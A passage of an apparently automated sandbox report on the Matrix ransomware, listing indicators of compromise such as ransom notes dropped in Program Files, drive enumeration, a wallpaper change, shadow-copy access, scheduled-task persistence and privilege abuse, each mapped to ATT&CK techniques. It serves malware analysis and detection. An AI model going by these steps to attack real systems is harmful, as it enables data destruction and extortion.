behavioral2/memory/4580-6748-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/7240-6750-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/7872-6754-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/2488-6756-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/7692-6758-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/7716-6761-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/8104-6765-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/8036-6768-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/216-6771-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/5132-6774-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/5976-6780-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/1856-6783-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/5208-6785-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/5332-6787-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/5468-6790-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/6556-6793-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/6580-6795-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/2900-6797-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/7800-6801-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/5800-6803-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/6828-6806-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/3784-6807-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/1652-6808-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/6096-6809-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/1976-6811-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/1500-6812-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/3256-6817-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/3560-6818-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/6172-6822-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/4940-6823-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Drops desktop.ini file(s) 27 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Documents\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Program Files\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\desktop.ini	MatrixRansomware.exe

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	MatrixRansomware.exe
File opened (read-only)	\??\G:	SjGmrQ0e64.exe
File opened (read-only)	\??\L:	SjGmrQ0e64.exe
File opened (read-only)	\??\N:	SjGmrQ0e64.exe
File opened (read-only)	\??\P:	SjGmrQ0e64.exe
File opened (read-only)	\??\U:	SjGmrQ0e64.exe
File opened (read-only)	\??\R:	MatrixRansomware.exe
File opened (read-only)	\??\Q:	MatrixRansomware.exe
File opened (read-only)	\??\P:	MatrixRansomware.exe
File opened (read-only)	\??\M:	MatrixRansomware.exe
File opened (read-only)	\??\K:	MatrixRansomware.exe
File opened (read-only)	\??\I:	MatrixRansomware.exe
File opened (read-only)	\??\A:	SjGmrQ0e64.exe
File opened (read-only)	\??\O:	SjGmrQ0e64.exe
File opened (read-only)	\??\R:	SjGmrQ0e64.exe
File opened (read-only)	\??\Z:	SjGmrQ0e64.exe
File opened (read-only)	\??\L:	MatrixRansomware.exe
File opened (read-only)	\??\J:	MatrixRansomware.exe
File opened (read-only)	\??\B:	SjGmrQ0e64.exe
File opened (read-only)	\??\X:	SjGmrQ0e64.exe
File opened (read-only)	\??\Y:	SjGmrQ0e64.exe
File opened (read-only)	\??\W:	MatrixRansomware.exe
File opened (read-only)	\??\T:	MatrixRansomware.exe
File opened (read-only)	\??\I:	SjGmrQ0e64.exe
File opened (read-only)	\??\Q:	SjGmrQ0e64.exe
File opened (read-only)	\??\Y:	MatrixRansomware.exe
File opened (read-only)	\??\S:	MatrixRansomware.exe
File opened (read-only)	\??\H:	MatrixRansomware.exe
File opened (read-only)	\??\E:	MatrixRansomware.exe
File opened (read-only)	\??\J:	SjGmrQ0e64.exe
File opened (read-only)	\??\S:	SjGmrQ0e64.exe
File opened (read-only)	\??\V:	SjGmrQ0e64.exe
File opened (read-only)	\??\W:	SjGmrQ0e64.exe
File opened (read-only)	\??\X:	MatrixRansomware.exe
File opened (read-only)	\??\N:	MatrixRansomware.exe
File opened (read-only)	\??\G:	MatrixRansomware.exe
File opened (read-only)	\??\E:	SjGmrQ0e64.exe
File opened (read-only)	\??\K:	SjGmrQ0e64.exe
File opened (read-only)	\??\V:	MatrixRansomware.exe
File opened (read-only)	\??\O:	MatrixRansomware.exe
File opened (read-only)	\??\M:	SjGmrQ0e64.exe
File opened (read-only)	\??\U:	MatrixRansomware.exe
File opened (read-only)	\??\H:	SjGmrQ0e64.exe
File opened (read-only)	\??\T:	SjGmrQ0e64.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\80DPgCP8.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	MatrixRansomware.exe
File created	C:\Program Files\Crashpad\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\batch_window.html	MatrixRansomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\uninstall\helper.exe	MatrixRansomware.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui	MatrixRansomware.exe
File created	C:\Program Files\Java\jre-1.8\lib\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jre-1.8\lib\images\cursors\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\sr.pak.DATA	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\koreus.luac	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\mi.pak.DATA	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\MLModels\autofill_labeling_features_email.txt.DATA	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\it.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\fontconfig.properties.src	MatrixRansomware.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\modules\host.luac	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\legal\jdk\ecc.md	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\Fingerprinting	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\mobile_equalizer.html	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\legal\jdk\relaxngcc.md	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\include\win32\jni_md.h	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\soundcloud.luac	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui	MatrixRansomware.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\ssvagent.exe	MatrixRansomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk-1.8\jre\lib\cmm\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\sk.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\ar.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\VisualElements\LogoCanary.png	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\bg.pak.DATA	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\jjs.exe	MatrixRansomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\defaults\pref\channel-prefs.js	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ca@valencia\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\pt-BR.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\Documentation.url	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jre-1.8\legal\jdk\icu.md	MatrixRansomware.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\Extensions\external_extensions.json	MatrixRansomware.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\it-IT\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\hu.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_proxy\identity_helper.Sparse.Internal.msix	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\management\jmxremote.password.template	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\ta.pak	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\nl.pak.DATA	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\msedge.dll.sig.DATA	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\cs.pak.DATA	MatrixRansomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\uninstall\shortcuts_log.ini	MatrixRansomware.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\default_apps\external_extensions.json	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_pt_BR.properties	MatrixRansomware.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac	MatrixRansomware.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\uk-UA\ImagingDevices.exe.mui	MatrixRansomware.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\vlc.mo	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\autofill_labeling_features_email.txt	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\VisualElements\SmallLogo.png	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\security\java.policy	MatrixRansomware.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\legal\javafx\icu_web.md	MatrixRansomware.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SjGmrQ0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SjGmrQ0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SjGmrQ0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SjGmrQ0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SjGmrQ0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SjGmrQ0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SjGmrQ0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SjGmrQ0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SjGmrQ0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SjGmrQ0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SjGmrQ0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SjGmrQ0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SjGmrQ0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SjGmrQ0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SjGmrQ0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SjGmrQ0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SjGmrQ0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SjGmrQ0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SjGmrQ0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
3240	vssadmin.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5840	schtasks.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
5936	SjGmrQ0e64.exe
5936	SjGmrQ0e64.exe
5936	SjGmrQ0e64.exe
5936	SjGmrQ0e64.exe
5936	SjGmrQ0e64.exe
5936	SjGmrQ0e64.exe
5936	SjGmrQ0e64.exe
5936	SjGmrQ0e64.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
5936	SjGmrQ0e64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	6748	takeown.exe
Token: SeDebugPrivilege	5936	SjGmrQ0e64.exe
Token: SeLoadDriverPrivilege	5936	SjGmrQ0e64.exe
Token: SeBackupPrivilege	3360	vssvc.exe
Token: SeRestorePrivilege	3360	vssvc.exe
Token: SeAuditPrivilege	3360	vssvc.exe
Token: SeTakeOwnershipPrivilege	1340	takeown.exe
Token: SeIncreaseQuotaPrivilege	6020	WMIC.exe
Token: SeSecurityPrivilege	6020	WMIC.exe
Token: SeTakeOwnershipPrivilege	6020	WMIC.exe
Token: SeLoadDriverPrivilege	6020	WMIC.exe
Token: SeSystemProfilePrivilege	6020	WMIC.exe
Token: SeSystemtimePrivilege	6020	WMIC.exe
Token: SeProfSingleProcessPrivilege	6020	WMIC.exe
Token: SeIncBasePriorityPrivilege	6020	WMIC.exe
Token: SeCreatePagefilePrivilege	6020	WMIC.exe
Token: SeBackupPrivilege	6020	WMIC.exe
Token: SeRestorePrivilege	6020	WMIC.exe
Token: SeShutdownPrivilege	6020	WMIC.exe
Token: SeDebugPrivilege	6020	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6020	WMIC.exe
Token: SeRemoteShutdownPrivilege	6020	WMIC.exe
Token: SeUndockPrivilege	6020	WMIC.exe
Token: SeManageVolumePrivilege	6020	WMIC.exe
Token: 33	6020	WMIC.exe
Token: 34	6020	WMIC.exe
Token: 35	6020	WMIC.exe
Token: 36	6020	WMIC.exe
Token: SeTakeOwnershipPrivilege	5404	takeown.exe
Token: SeTakeOwnershipPrivilege	4868	takeown.exe
Token: SeIncreaseQuotaPrivilege	6020	WMIC.exe
Token: SeSecurityPrivilege	6020	WMIC.exe
Token: SeTakeOwnershipPrivilege	6020	WMIC.exe
Token: SeLoadDriverPrivilege	6020	WMIC.exe
Token: SeSystemProfilePrivilege	6020	WMIC.exe
Token: SeSystemtimePrivilege	6020	WMIC.exe
Token: SeProfSingleProcessPrivilege	6020	WMIC.exe
Token: SeIncBasePriorityPrivilege	6020	WMIC.exe
Token: SeCreatePagefilePrivilege	6020	WMIC.exe
Token: SeBackupPrivilege	6020	WMIC.exe
Token: SeRestorePrivilege	6020	WMIC.exe
Token: SeShutdownPrivilege	6020	WMIC.exe
Token: SeDebugPrivilege	6020	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6020	WMIC.exe
Token: SeRemoteShutdownPrivilege	6020	WMIC.exe
Token: SeUndockPrivilege	6020	WMIC.exe
Token: SeManageVolumePrivilege	6020	WMIC.exe
Token: 33	6020	WMIC.exe
Token: 34	6020	WMIC.exe
Token: 35	6020	WMIC.exe
Token: 36	6020	WMIC.exe
Token: SeTakeOwnershipPrivilege	2036	takeown.exe
Token: SeTakeOwnershipPrivilege	3364	takeown.exe
Token: SeTakeOwnershipPrivilege	1060	takeown.exe
Token: SeTakeOwnershipPrivilege	6504	takeown.exe
Token: SeTakeOwnershipPrivilege	1392	takeown.exe
Token: SeTakeOwnershipPrivilege	6644	takeown.exe
Token: SeTakeOwnershipPrivilege	6272	takeown.exe
Token: SeTakeOwnershipPrivilege	7100	takeown.exe
Token: SeTakeOwnershipPrivilege	7384	takeown.exe
Token: SeTakeOwnershipPrivilege	3404	takeown.exe
Token: SeTakeOwnershipPrivilege	6776	takeown.exe
Token: SeTakeOwnershipPrivilege	1744	takeown.exe
Token: SeTakeOwnershipPrivilege	7796	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 916 wrote to memory of 3364	916	MatrixRansomware.exe	83
PID 916 wrote to memory of 3364	916	MatrixRansomware.exe	83
PID 916 wrote to memory of 3364	916	MatrixRansomware.exe	83
PID 916 wrote to memory of 932	916	MatrixRansomware.exe	85
PID 916 wrote to memory of 932	916	MatrixRansomware.exe	85
PID 916 wrote to memory of 932	916	MatrixRansomware.exe	85
PID 916 wrote to memory of 1744	916	MatrixRansomware.exe	87
PID 916 wrote to memory of 1744	916	MatrixRansomware.exe	87
PID 916 wrote to memory of 1744	916	MatrixRansomware.exe	87
PID 916 wrote to memory of 3164	916	MatrixRansomware.exe	88
PID 916 wrote to memory of 3164	916	MatrixRansomware.exe	88
PID 916 wrote to memory of 3164	916	MatrixRansomware.exe	88
PID 916 wrote to memory of 4176	916	MatrixRansomware.exe	91
PID 916 wrote to memory of 4176	916	MatrixRansomware.exe	91
PID 916 wrote to memory of 4176	916	MatrixRansomware.exe	91
PID 1744 wrote to memory of 3940	1744	cmd.exe	94
PID 1744 wrote to memory of 3940	1744	cmd.exe	94
PID 1744 wrote to memory of 3940	1744	cmd.exe	94
PID 3164 wrote to memory of 5548	3164	cmd.exe	95
PID 3164 wrote to memory of 5548	3164	cmd.exe	95
PID 3164 wrote to memory of 5548	3164	cmd.exe	95
PID 1744 wrote to memory of 7360	1744	cmd.exe	96
PID 1744 wrote to memory of 7360	1744	cmd.exe	96
PID 1744 wrote to memory of 7360	1744	cmd.exe	96
PID 1744 wrote to memory of 8148	1744	cmd.exe	97
PID 1744 wrote to memory of 8148	1744	cmd.exe	97
PID 1744 wrote to memory of 8148	1744	cmd.exe	97
PID 4176 wrote to memory of 6764	4176	cmd.exe	98
PID 4176 wrote to memory of 6764	4176	cmd.exe	98
PID 4176 wrote to memory of 6764	4176	cmd.exe	98
PID 4176 wrote to memory of 6748	4176	cmd.exe	99
PID 4176 wrote to memory of 6748	4176	cmd.exe	99
PID 4176 wrote to memory of 6748	4176	cmd.exe	99
PID 5548 wrote to memory of 6732	5548	wscript.exe	100
PID 5548 wrote to memory of 6732	5548	wscript.exe	100
PID 5548 wrote to memory of 6732	5548	wscript.exe	100
PID 6732 wrote to memory of 5840	6732	cmd.exe	102
PID 6732 wrote to memory of 5840	6732	cmd.exe	102
PID 6732 wrote to memory of 5840	6732	cmd.exe	102
PID 4176 wrote to memory of 5868	4176	cmd.exe	103
PID 4176 wrote to memory of 5868	4176	cmd.exe	103
PID 4176 wrote to memory of 5868	4176	cmd.exe	103
PID 5868 wrote to memory of 5884	5868	cmd.exe	104
PID 5868 wrote to memory of 5884	5868	cmd.exe	104
PID 5868 wrote to memory of 5884	5868	cmd.exe	104
PID 5884 wrote to memory of 5936	5884	SjGmrQ0e.exe	105
PID 5884 wrote to memory of 5936	5884	SjGmrQ0e.exe	105
PID 5548 wrote to memory of 5956	5548	wscript.exe	106
PID 5548 wrote to memory of 5956	5548	wscript.exe	106
PID 5548 wrote to memory of 5956	5548	wscript.exe	106
PID 5956 wrote to memory of 3132	5956	cmd.exe	108
PID 5956 wrote to memory of 3132	5956	cmd.exe	108
